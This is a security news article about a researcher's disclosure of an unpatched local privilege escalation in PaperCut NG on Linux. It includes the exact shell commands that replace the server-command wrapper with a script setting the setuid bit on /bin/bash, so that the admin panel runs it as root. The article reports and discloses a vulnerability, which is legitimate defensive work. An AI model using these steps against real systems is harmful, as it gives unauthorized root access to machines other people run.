Researcher Details Unpatch Papercut Privilege Escalation Vulnerability

In the interconnected world of software and cybersecurity, even the most seemingly innocuous applications can harbor dangerous vulnerabilities. This is the story of Papercut, a widely used printing management software, and how a security researcher uncovered a critical flaw that could turn a lowly printer into a stepping stone for hackers.

Martin Mielke, a security researcher, was probing the latest version of Papercut (version 22.0.12) installed on an Ubuntu 22.04 system. Papercut, a software compatible with major brands and platforms, is a mainstay in organizations worldwide. It’s a vital cog in the printing operations of large companies, state organizations, and educational institutes, serving hundreds of millions across over 100 countries.

Mielke’s installation was unassuming, utilizing a low-privileged user account named ‘papercut’. The crux of the issue lay in how Papercut handled certain web application functionalities. Mielke discovered that by accessing the application admin panel via port 9191 and navigating to a specific page, he could execute commands as the root user, despite being logged in with limited privileges.

This privilege escalation was possible due to a flaw in the execution of a script (`/bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key`). The script, residing in the directory of the ‘papercut’ user, could be replaced with any binary or shell script, allowing Mielke to execute arbitrary commands with root privileges.

To exploit this vulnerability, Mielke replaced the ‘server-command’ file with a script that altered the permissions of the bash shell, granting it setuid permissions. By doing so, any command run through the bash shell would execute with root privileges, effectively elevating the rights of the low-privileged ‘papercut’ user to that of the root user.

To execute the attack, run the following commands as the low-privileged “papercut” user:

papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command

#!/bin/sh

#

# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd

#

# A wrapper for server-command

#



. `dirname $0`/.common



export CLASSPATH

${JRE_HOME}/bin/java \

        -Djava.io.tmpdir=${TMP_DIR} \

        -Dserver.home=${SERVER_HOME} \

        -Djava.awt.headless=true \

        -Djava.locale.providers=COMPAT,SPI \

        -Dlog4j.configurationFile=file:${SERVER_HOME}/lib/log4j2-command.properties \

        -Xverify:none \

	biz.papercut.pcng.server.ServerCommand \

	"$@"



papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak

papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command

papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command

papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command



papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command

#!/bin/bash

chmod u+s /bin/bash

Reported a LPE on the Linux version of Papercut NG about 6 months ago. Still doesn't seem to be fixed on the current version (23.0.3). Here are the details:https://t.co/dLagFUpizL

— Martin Mielke @ zer0con24 (@xct_de) December 3, 2023